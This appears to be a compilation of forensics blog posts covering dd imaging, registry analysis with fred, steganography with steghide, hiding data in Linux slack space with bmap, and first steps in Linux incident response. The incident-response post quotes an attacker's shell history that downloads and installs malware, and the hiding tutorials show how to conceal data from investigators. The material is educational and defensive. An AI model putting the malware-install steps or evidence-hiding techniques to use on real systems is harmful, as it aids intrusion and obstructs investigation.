Category: Digital Forensics

How To Use DD On Windows Systems

DD is a forensic imaging tool. It’s been around for quite a while and sometimes is referred to as GNU dd. It is a command line program that accepts certain arguments to control its imaging functionality. If not used wisely you can accidentally destroy the media that you are trying to duplicate. So, it must be used with caution. When done correctly it creates raw image files that can then be further used by other forensic tools such as ENCase and FTK.

To get a copy of the dd utility for windows go to: http://www.chrysocome.net/downloads/dd-0.5.zip. It’s a free program distributed under a GPL (General Public License).

Then you can unzip the download onto your desktop or whichever directory you prefer.

For my demonstration, I created a couple of test partitions and then used the dd utility to do a volume copy of one partition to another. So I created a “G:” and  a “H:”.

Each partition had the exact same space for my first attempt but for my second attempt I gave the H partition an extra 1GB. Any time you wish to create an image using dd you need to make sure your output file storage area has enough capacity for the copy.

From there you open a command prompt as administrator. This requirement is most likely dictated by the security configuration of your PC so it may not be necessary depending on your security settings.

Navigate to the directory containing the unzipped dd executable.

After that you can use dd –list to get a list of the devices on your computer.

The basic structure of dd is:

dd if= of= bs=

Where “if” is your input file, “of” is your output file, and “bs” is your block size.

You can use null inputs such as /dev/zero to write zeros to a partition. This effectively wipes that partition or drive.

One note on block size. 512 Bytes is as low as it goes. The lower the block size the slower it takes so if you plan on copying a large drive the lower block size might dramatically increase the time it takes. A lower block size will be more accurate. You can chose sizes such as 512, 1024, 2048, 4096.

For my example I simply copied one partition to another.

This should have effectively copied one directory to another.

I repeated the process extending the size of the H: partition to 3GB and instead created an image with the dd command.

This worked as expected.

dd is an easy to user tool and provides effective imaging of a drive or partition bit-by-bit.

How To View Windows Registry On Linux

Introduction

Forensic Registry EDitor (fred) is a cross-platform Microsoft registry hive editor. It is GUI based registry editor that can work on Linux and has a built in hex viewer and data interpreter.

Installation

The best way to install this tool is listening its owner Daniel:

In order to automatically stay up-to-date when new versions are released, I recommend adding my repository to your software sources list. This is done by executing the following commands:

sudo wget -P /etc/apt/sources.list.d/ http://deb.pinguin.lu/pinguin.lu.list
wget -q http://deb.pinguin.lu/debsign_public.key -O- | sudo apt-key add -
sudo apt-get update

Once done, you can install packages by issuing:

sudo apt-get install fred fred-reports

 

Environment

I used a hard disk image of a Windows system.

# ewfmount myImage.E01 /mnt/ewf/
# mount -o ro,loop,show_sys_files,streams_interface=windows /mnt/ewf/ewf1 /mnt/windows_mount

I mounted my image in /mnt/windows_mount. Since I was using an E01 image, I used two step process to mount my image. For details on how to mount E01 image in Linux you can check this post. You don’t need to use E01 image. Any image you could mount in Linux i.e. raw image would be fine.

 

Usage

I will give some examples that shows how to use this powerful tool. First let’s cover the locations of hives. If you already  are familiar with Windows Registry you can skip this section and continue on Finding unique device serial number of a USB Key.

In Windows NT 4 (and later) the Registry is stored in the Windows NT Registry File (REGF) format (http://www.forensicswiki.org/wiki/Windows_Registry).

Basically the following Registry hives are stored in the corresponding files:

  • HKEY_USERS: \Documents and Setting\User Profile\NTUSER.DAT
  • HKEY_USERS\DEFAULT: C:\Windows\system32\config\default
  • HKEY_LOCAL_MACHINE\SAM: C:\Windows\system32\config\SAM
  • HKEY_LOCAL_MACHINE\SECURITY: C:\Windows\system32\config\SECURITY
  • HKEY_LOCAL_MACHINE\SOFTWARE: C:\Windows\system32\config\software
  • HKEY_LOCAL_MACHINE\SYSTEM: C:\Windows\system32\config\system

1. Finding unique device serial number of a USB Key

This information is stored at SYSTEM\CurrentControlSet001\Enum\USBSTOR

We know that SYSTEM registry hives are stored in C:\Windows\system32\config\system

Lets go to the directory that we have system file (/WINDOWS/system32/config/system) I mounted it in the /mnt/windows_mount so I will type

cd /mnt/windows_mount/WINDOWS/system32/config

Then I can type the following to run fred on system file:

root@siftworkstation:/mnt/windows_mount/WINDOWS/system32/config# fred system

So it is the value I circled red.

 

fred1

2.What was  last time that a user opened a .doc file

This data stored  in NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsn>

NTUSER.DAT is in \Documents and Setting\User Profile. First we need to go into that directory and run

fred NTUSER.DAT

fred2

So it is the value I circled red.

3.What was the last program a user ran using the Start->Run dialog.

We need to use fred and open NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

fred3

At the right column we see what the user run using start->run.

Conclusion

Windows registry includes good information for investigators. Fred helps investigators to find the data they need in registry very easily. The best thing about Fred it is open source and cost you zero dollar…

I would love to hear from you about what you think about fred and  registry tools in general.

 

 

 

 

 

 

Forensics Netwars First Day

I was planning to attend DFIR Summit for last two years and now I am in Austin for that. As part of DFIR summit I am attending Forensics netwars. Forensics netwars is a fun practice that help you to remember the forensics knowledge you may forget and learn some new tricks. The best thing is if you screw up, that’s okay. You cannot damage anything but your netwars score…

I remembered the power of stat command when it comes to mac time.  I also found a new tool called Fred for analyzing registry.  I also remembered that -iname option will ignore case when you use it in “find” command.

I am planning to write how to install and use Fred this week.

 

 

Hiding Data: Steganography on Linux

My last blog post was about hiding info on slackspace by using a special tool called Bmap. Today I am going to discuss Steganography in more general. Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message. It is different than encryption since encryption may not care existence of cipher text from outside world. However steganography deals with hiding information even if it is encrypted.

See following example:

Alex wants to send a message to Bob. She wants only Bob reads the message. She can use encryption (symmetric or asymmetric). The risk here is possible attack for deciphering her message. She can also try hiding the message in a different format (say in a jpeg file) and send over the Bob. Since the message will be in a picture probably attacker Tom will not recover the message from the file.

Of course in case he desperately wants to read the message, he can use some forensics tools to read the message. For this reason combining encryption with a stenography will be best choice for Alex.

Today I am going to discuss a Linux tool steghide that does both encryption and stenography. On debian based system you can install steghide by following command:

apt-get install steghide

By default steghide compress the embedded data, and encrypted with rijndael-128 algorithm.

I have two files under my Private folder:

root@bt:~/Private# ls -l
total 24
-rw-r--r-- 1 root root    20 Jan 30 18:24 myMessageToBob.txt
-rw-r--r-- 1 root root 17875 Jan 30 18:23 soccer.jpg

My goal is embedding text file into jpeg file.

Let’s check if we have enough space on jpeg file to do that:

steghide info soccer.jpg
"soccer.jpg":
format: jpeg
capacity: 1.0 KB
Try to get information about embedded data ? (y/n)

So we can embed 1.0KB data and we only have 20B data (see ls -l output)

root@bt:~/Private# steghide embed -cf soccer.jpg -ef myMessageToBob.txt
Enter passphrase:
Re-Enter passphrase:
embedding "myMessageToBob.txt" in "soccer.jpg"... done

-cf stands for cover file whereas -ef stands for embedded file.

Let’s now check the size of the jpeg file.

ls -l
total 24
-rw-r--r-- 1 root root    20 Jan 30 18:24 myMessageToBob.txt
-rw-r--r-- 1 root root 18396 Jan 30 18:27 soccer.jpg

Himm, it got bigger and that was expected but the original data was just 20B and we know that steghide will compress data before embedding.

As you guess the reason of 521B (18396-17875) is encryption and crc check sum of the embedded data that will also added into the jpeg file.

Try to open the jpeg file. You will not see any difference from the original jpeg file.

Now, we want to extract the data out of the jpeg file.

root@bt:~/Private# steghide extract -sf soccer.jpg
Enter passphrase:
the file "myMessageToBob.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "myMessageToBob.txt".


root@bt:~/Private# ls -l
total 24
-rw-r--r-- 1 root root    20 Jan 30 18:58 myMessageToBob.txt
-rw-r--r-- 1 root root 18396 Jan 30 18:27 soccer.jpg

After we extracted the text file from jpeg file the file in the jpeg is still there (check the size after embedding and after extracting, they are same)

The only disadvantage I can think of is not being able to wipe the data from the cover file (the file you embed data into).

Hiding Data: Slack Space on Linux

I am going to cover slack space in various operating systems. the first post would be about the slack space in Linux.

What is Slack Space?

Before going to explain slack space, one should know what blocks (on Linux) and clusters mean (on Windows).  Blocks are specific sized containers used by file system to store data. Blocks can also be defined as the smallest pieces of data that a file system can use to store information. Files can consist of a single or multiple blocks/clusters in order to fulfill the size requirements of the file. When data is stored in these blocks two mutually exclusive conditions can occur; The block is completely full, or the block is partially full. If the block is completely full then the most optimal situation for the file system has occurred. If the block is only partially full then the area between the end of the file the end of the container is referred to as slack space. Linux write nulls on slack space. This means to find data in slack space on Linux systems are rare. However, it is not impossible.

Today, I am going to show how to hide data on slack spaces using a tool called bmap.

Bmap

Bmap ,a data hiding tool, can utilize slack space in blocks to hide data.

It can  perform lots of functions interesting to the computer forensics community and the computer security community. However, in this article we will focus on its data hiding capability.

Installing Bmap

Click this link and save the tar.gz file on your Linux desktop.tar xvzf bmap-1.0.17.tar.gz

After untaring the file, we now can go inside of the directory and compile the program.
cd bmap-1.0.17
make

Optional: I placed bmap into /sbin so don’t need to go into the bmap directory each time I want to run the program.
ln -s yourBmapFilePath /sbin/bmap

Hiding Data on Slack Space

In the following example we will hide some text into slack space. Let’s see what options we have with bmap:
bmap --help
bmap:1.0.17 (12/25/10) newt@scyld.com
Usage: bmap [OPTION]... []
use block-list knowledge to perform special operations on files
--doc VALUE
where VALUE is one of:
version display version and exit
help display options and exit
man generate man page and exit
sgml generate SGML invocation info
--mode VALUE
where VALUE is one of:
map list sector numbers
carve extract a copy from the raw device
slack display data in slack space
putslack place data into slack
wipeslack wipe slack
checkslack test for slack (returns 0 if file has slack)
slackbytes print number of slack bytes available
wipe wipe the file from the raw device
frag display fragmentation information for the file
checkfrag test for fragmentation (returns 0 if file is fragmented)
--outfile write output to ...
--label useless bogus option
--name useless bogus option
--verbose be verbose
--log-thresh logging threshold ...
--target operate on ...

The option I am going to use –mode option with slack, putslack, wipe, map VALUEs. I have created a text file named Ismail.txt. Let’s see what sectors this file uses.
bmap --mode map ismail.txt
3113400
3113401
3113402
3113403
3113404
3113405
3113406
3113407

As you can see from the output of bmap, ismail.txt uses 8 sectors starting from 3113400. This corresponds a block in Linux. This text file is too small to use all of these sector in the block.

bmap --mode slack ismail.txt
getting from block 389175
file size was: 8
slack size: 4088
block size: 4096

The file only uses 8 bytes (1 sector is 512 bytes, so it is in the first sector). All of 7 sectors and 504 bytes of the first sector are empty (Linux write null on the slack space, so all they have 0s.)

We can use this slack space to hide data.

echo "I'm hiding this and you cannot easily see it" | bmap --mode putslack ismail.txt
stuffing block 389175
file size was: 8
slack size: 4088
block size: 4096

Now check what we have in slack space:

bmap --mode slack ismail.txt
getting from block 389175
file size was: 8
slack size: 4088
block size: 4096
I'm hiding this and you cannot easily see it

(This command also gives the block number of the file, 389175)

We can now wipe the data we put on slack space.
bmap --mode wipe ismail.txt

bmap --mode slack ismail.txt
getting from block 389175
file size was: 8
slack size: 4088
block size: 4096

Summary

Slack space can be used for hiding data. Even though advanced forensics tools reveal the hidden information in slack space, most system owners will not check all slack space since this is so time consuming activity. Bmap is one of the tool that helps attackers to hide information into slack space on Linux systems. As security engineers, we need to be careful when we analyze a compromised Linux systems and check slack space as well.

How to Suck at Information Security

Security Policy and Compliance

  • Ignore regulatory compliance requirements.
  • Assume the users will read the security policy because you’ve asked them to.
  • Use security templates without customizing them.
  • Jump into a full-blown adoption of frameworks such as ISO 27001/27002 before you’re ready.
  • Create security policies you cannot enforce.
  • Enforce policies that are not properly approved.
  • Blindly follow compliance requirements without creating overall security architecture.
  • Create a security policy just to mark a checkbox.
  • Pay someone to write your security policy without any knowledge of your business or processes.
  • Translate policies in a multi-language environment without consistent meaning across the languages.
  • Make sure none of the employees finds the policies.
  • Assume that if the policies worked for you last year, they’ll be valid for the next year.
  • Assume that being compliant means you’re secure.
  • Assume that policies don’t apply to executives.
  • Hide from the auditors.

Security Tools

  • Deploy a security product out of the box without tuning it.
  • Tune the IDS to be too noisy, or too quiet.
  • Buy security products without considering the maintenance and implementation costs.
  • Rely on anti-virus and firewall products without having additional controls.
  • Run regular vulnerability scans, but don’t follow through on the results.
  • Let your anti-virus, IDS, and other security tools run on “auto-pilot.”
  • Employ multiple security technologies without understanding how each of them contributes.
  • Focus on widgets, while omitting to consider the importance of maintaining accountability.
  • Buy expensive product when a simple and cheap fix may address 80% of the problem.

Risk Management

  • Attempt to apply the same security rigor to all IT assets, regardless of their risk profiles.
  • Make someone responsible for managing risk, but don’t give the person any power to make decisions.
  • Ignore the big picture while focusing on quantitative risk analysis.
  • Assume you don’t have to worry about security, because your company is too small or insignificant.
  • Assume you’re secure because you haven’t been compromised recently.
  • Be paranoid without considering the value of the asset or its exposure factor.
  • Classify all data assets as “top secret.”

Security Practices

  • Don’t review system, application, and security logs.
  • Expect end-users to forgo convenience in place of security.
  • Lock down the infrastructure so tightly, that getting work done becomes very difficult.
  • Say “no” whenever asked to approve a request.
  • Impose security requirements without providing the necessary tools and training.
  • Focus on preventative mechanisms while ignoring detective controls.
  • Have no DMZ for Internet-accessible servers.
  • Assume your patch management process is working, without checking on it.
  • Delete logs because they get too big to read.
  • Expect SSL to address all security problems with your web application.
  • Ban the use of external USB drives while not restricting outbound access to the Internet.
  • Act superior to your counterparts on the network, system admin, and development teams.
  • Stop learning about technologies and attacks.
  • Adopt hot new IT or security technologies before they have had a chance to mature.
  • Hire somebody just because he or she has a lot of certifications.
  • Don’t apprise your manager of the security problems your efforts have avoided.
  • Don’t cross-train the IT and security staff.

Password Management

  • Require your users to change passwords too frequently.
  • Expect your users to remember passwords without writing them down.
  • Impose overly-onerous password selection requirements.
  • Use the same password on systems that differ in risk exposure or data criticality.
  • Impose password requirements without considering the ease with which a password could be reset.

Thanks for Lenny Zelster for its awesome cheat sheet. For original document please see http://zeltser.com/security-management/suck-at-security-cheat-sheet.html. If you have any suggestions other than the ones at above, let me know! ismail@realinfosec.com

Legal and Electronic Discovery in the Cloud

Cloud Computing creates new dynamics in the relationship between an organization and its information, involving the presence of a third party: the cloud provider. This creates new challenges in understanding how laws apply to a wide variety of information management scenarios.

A complete analysis of Cloud Computing-related legal issues requires consideration of functional, jurisdictional, and contractual dimensions.

•The functional dimension involves determining which functions and services in Cloud Computing have legal implications for participants and stakeholders.

•The jurisdictional dimension involves the way in which governments administer laws and regulations impacting Cloud Computing services, the stakeholders, and the data assets involved.

•The contractual dimension involves the contract structures, terms and conditions, and enforcement mechanisms through which stakeholders in Cloud Computing environments can address and manage the legal and security issues.

Cloud Computing in general can be distinguished from traditional outsourcing in three ways: the time of service (on-demand and intermittent), the anonymity of identity of the service provider(s) and anonymity of the location of the server(s) involved. When considering IaaS and PaaS specifically, a great deal of orchestration, configuration, and software development is performed by the customer — so much of the responsibility cannot be transferred to the cloud provider.

Compliance with recent legislative and administrative requirements around the world forces stronger collaboration among lawyers and technology professionals. This is especially true in Cloud Computing, due to the potential for new areas of legal risk created by the distributed nature of the cloud, compared to traditional internal or outsourced infrastructure.

Numerous compliance laws and regulations in the United States and the European Union either impute liability to “ subcontractors or require business entities to impose liability upon them via contract.

Courts now are realizing that information security management services are critical to making decisions as to whether digital information may be accepted as evidence. While this is an issue for traditional IT infrastructure, it is especially concerning in Cloud Computing due to the lack of established legal history with the cloud.

Recommendations

√ Customers and cloud providers must have a mutual understanding of each other’s roles and responsibilities related to electronic discovery, including such activities as litigation hold, discovery searches, who provides expert testimony, etc.

√ Cloud providers are advised to assure their information security systems are responsive to customer requirements to preserve data as authentic and reliable, including both primary and secondary information such as metadata and log files.

√ Data in the custody of cloud service providers must receive equivalent guardianship as in the hands of their original owner or custodian.

√ Plan for both expected and unexpected termination of the relationship in the contract negotiations, and for an orderly return or secure disposal of assets.

√ Pre-contract due diligence, contract term negotiation, post-contract monitoring, and contract termination, and the transition of data custodianship are components of the duty of care required of a cloud services client.

√ Knowing where the cloud service provider will host the data is a prerequisite to implementing the required measures to ensure compliance with local laws that restrict the cross-border flow of data.

√ As the custodian of the personal data of its employees or clients, and of the company’s other intellectual property assets, a company that uses Cloud Computing services should ensure that it retains ownership of its data in its original and authenticable format.

√ Numerous security issues, such as suspected data breaches, must be addressed in specific provisions of the service agreement that clarify the respective commitments of the cloud service provider and the client.

√ The cloud service provider and the client should have a unified process for responding to subpoenas, service of process, and other legal requests.

√ The cloud services agreement must allow the cloud services client or designated third party to monitor the service provider’s performance and test for vulnerabilities in the system.

√ The parties to a cloud services agreement should ensure that the agreement anticipates problems relating to recovery of the client’s data after their contractual relationship terminates.

References: Cloud Security Alliance Guide

Introduction to Linux Forensics- Part I

It has been two weeks since I have not made a new blog post. There are some reasons behind this. I am busy with the work.

However, I don’t ignore my blog and actually was writing 2 new blog posts; one for the e-mail security with GPG and another one  for my third Nessus blog post. Those are still in progress. I just saved them and will complete as soon as I have more free time.

I am currently visiting Rackspace Cloud at San Antonio. I started to write this blog post in the plane and now I will complete it in my hotel room…

———————————————————————————————————

I am currently writing an article for the Slicehost customers to show them how to investigate their slices (Linux VPS) during a  possible compromise.

I am doing some research and implementing my knowledge on the Slicehost environment which takes quite time to complete the article.

I thought it would be good to have a blog post about a more general environment. This is the my first forensic related post. Yes, I have huge interest on Computer Forensics.

Introduction

First of all, this article covers only the basic of Linux forensics. By saying that I won’t cover any highly sophisticated forensic techniques here ( at least in first two articles)

The aim of this blog post is simply showing you the way you can investigate your compromised Linux machine and learn from your mistakes. ( I will have articles about some advanced forensics tools such as autopsy, vinetto and MboxGrep later)

IMPORTANT WARNING: Before you do anything, you need to make an important decision—do you plan to involve law enforcement and prosecute the attacker? If the answer is yes, you should leave the compromised system alone and make no changes to it.

Any changes you make post-attack could complicate and taint the evidence, and because of that, many people have a policy of unplugging a system once they detect an attack and leaving it off until law enforcement arrives.

Investigators likely will want the complete system, or at least the drives, so they can store it safely; thus, your forensics analysis might end here until your system is returned. [1]

Nobody is perfect. Everybody can make mistakes. However, I avoid as much as possible to make same mistake twice. I believe only stupid people do that. At least, I feel stupid if I do same mistakes.

Ok, back to our lesson. We have a compromised Linux machine. First be calm. It is ok to get hacked. We are not only ones whose boxes got cracked. Of course, good system administrators will do everything to avoid this type of situation.

However, even if you believe you are so knowledgeable system admin, your machines can be hacked by an attacker who exploited a new discovered vulnerability…

Checking Network Connection

Check the network connections and open ports with netstat command.

Usage

netstat -an

By running this command you can see the any backdoors that are listening
.

tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN

In this case we see port 6697 is open. It is not a good sign because that port is used by IRC. We can sniff the connection by tcpdump. For more info on tcpdump, check this blog post.

tcpdump src port 6697

You can check here for more info on IRC bots.

Checking Last Logged in IPs

Brute force attack is a very popular type of attack. You may be able to find who was attacked you by checking last logged in IPs with the last command.

Using last you can determine the time a user logged in and out. It also provide you the hostname / IP address from where the user logged in from.

last -25

This will give us last 25 users’ IP who logged in the system.

/var/log/auth_log file can also have valuable information regarding to successful or failed login attempts.

Checking Last Commands

You may have heard “No crime is perfect” a lot if you have ever watched the Forensic Files TV show. It is true. Only a few good hackers cannot leave their finger prints on their digital crime.

For example, most of the time intruders leave their  their .bash_history files. .bash_history file contains the last commands used with the bash shell.

This can give  us a lot information about what they did, what they installed and where they got their files from. Typical entries may include,

wget http://malware.tar.gz
gunzip malware.tar.gz
tar xf malware.tar
cd hpd
install
cd ..
rm malware.tar
cd /dev/.hpd

This tells us the url they got the malware from, how they ran it, and where it was
installed. A good starting point for looking for their directory! [2]

Be aware of the way .bash_history store the information! It only show the all commands which has been run by a spesific user after he logged out.

In case attacker is logged in and you are trying to check his .bash_history, you may see an empty file.

Use who command to see active users on the machine.

who
user1 pts/0 Nov 18 23:33 (1.2.3.4)
user2 pts/1 Nov 16 10:22 (5.6.7.8)

We see two active users on the system. If user2 is compromised account, we should tcpdump and monitor his activity:

tcpdump host 5.6.7.8 -w demo.dump

You can also use thehistory command to list the history of the last executed commands.

To get more useful information from history command and .bash_history file, let’s modify /etc/profile directory.

Add following line at the end of the file:

export HISTTIMEFORMAT=”%h/%d – %H:%M:%S “

You can now see the time when the commands run. (You will be able to see all commands with time stamps on the history ‘s output.

However, for .bash_history, you will be only able to see time stamps for new commands which is not useful for us.

Summary

We learn some basic information for investigating compromised Linux machines such as checking network connection, active users on the system, getting bash history, last logged in users IP etc… All of these are so critical information to track intruders and find security holes on the system.

The next post will discuss integrity checks and some helpful tools such as rootkit scanners.